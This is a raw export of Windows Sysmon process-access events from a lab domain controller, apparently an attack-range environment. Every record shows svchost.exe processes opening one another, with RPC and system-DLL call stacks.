13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.539{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.508{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.508{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.508{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000010591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.492{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:21.477{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 